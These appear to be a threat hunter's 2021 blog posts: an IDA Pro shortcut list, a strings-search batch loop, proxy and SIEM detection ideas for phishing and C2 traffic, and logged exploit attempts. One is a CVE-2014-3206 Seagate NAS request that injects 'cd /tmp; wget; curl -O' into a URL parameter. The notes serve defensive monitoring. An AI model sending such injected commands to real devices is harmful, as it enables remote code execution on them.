Sunday, November 7, 2021

Batch Script run Strings on all Files Searching for Keyword

 for %%f in (*) do (

    c:\users\221602\desktop\neo_apps\strings64.exe -n 8 %%f | findstr github


Thursday, September 30, 2021

IDA Pro Keyboard Shortcuts

 Ascii strings

"highlight the string", press 'a'

Unicode strings

highlight the ascii string, press 'Alt-a', choose unicode

Rename variable

highlight variable, press 'n'

Cross References

highlight the variable, press 'x'


into f7

over f8

run until return ctrl-f7

continue f9



jump to address

press 'g', enter address



comment a line

press ';', enter the comment

Friday, September 10, 2021

Threat Hunt - Proxy Phishing from HTML attachment

 proxy #threathunt idea:

where urlpath = '/next.php' and method = 'POST' and referrer is null cred #phishing 9/10/21 Sharepoint Theme sbj: notification 1 new FAX from: mout.kundenserver[.de HTML attachment posts stolen creds to gms4372.nelrg[.com/gfkn/next.php

Threat Hunt - Proxy C2 IP with PHP

potential proxy #threathunt idea

post or put to urls that contain ip address and php

domain matches '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$'
method in ('POST', 'PUT')
urlpath endswith '.php'

Siem Rule - IP Lookup Service

 Malware IP lookup service #siem detection rule idea

dns request in:

















imagename not in 

 - brave.exe

 - iexplore.exe

 - opera.exe

 - firefox.exe

 - msedge.exe

 - chrome.exe

 - vivaldi.exe

Wednesday, August 18, 2021

CVE-2014-3206 Seagate NAS RCE

CVE-2014-3206 Seagate NAS RCE

Seen August 7th, 2021 exploiting by 155.4.223[.]53

GET /backupmgt/localJob.php?session=fail;cd+/tmp;wget+;curl+-O+;

CVE-2020-7796 SSRF Zimbra

 Sample exploit attempt of

"CVE-2020-7796" -> "...Potential for SSRF if WebEx zimlet installed and zimlet JSP enabled..." -> Vuln Details -> Seen this week from 103.138.125[.]199 #CVE20207796